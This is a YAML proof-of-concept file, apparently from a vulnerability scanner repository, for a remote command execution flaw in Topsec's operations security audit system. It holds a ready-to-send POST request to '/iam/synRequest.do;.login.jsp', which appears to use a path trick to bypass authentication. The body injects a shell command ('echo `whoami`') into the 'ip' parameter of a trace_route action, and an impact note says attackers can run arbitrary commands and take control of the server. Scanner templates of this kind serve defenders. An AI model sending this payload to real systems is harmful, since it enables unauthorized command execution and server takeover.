Poc_Scanner/poc/SE-Poc/iam-synRequest-RCE.yaml
2024-10-09 15:15:50 +08:00

32 lines
1.3 KiB
YAML
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

keyword: iam
name: 天融信运维安全审计系统远程命令执行漏洞
description: | # 下一行可填写漏洞描述
天融信运维安全审计系统synRequest存在远程命令执行漏洞
requests: # 为空代表默认或者不启用
path: "/iam/synRequest.do;.login.jsp"
method: POST
headers:
Accept: '*/*'
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8
Referer: https://www.baidu.com
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
body-raw: |- # 如果需要发送请求体,在下一行开始填写
method=trace_route&w=1&ip=127.0.0.1|echo%20`whoami`%3b&m=10
response:
path: "" # 不填则默认接收此请求的响应包
status-code: 200
body: " " # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
time: # 此处填写响应包响应时间,默认不启用
headers:
Server:
Content-type:
Content-length:
Date:
Connection:
impact: | # 下一行可填写漏洞影响
天融信运维安全审计系统synRequest存在远程命令执行漏洞攻击者可利用该漏洞执行任意命令获取服务器权限。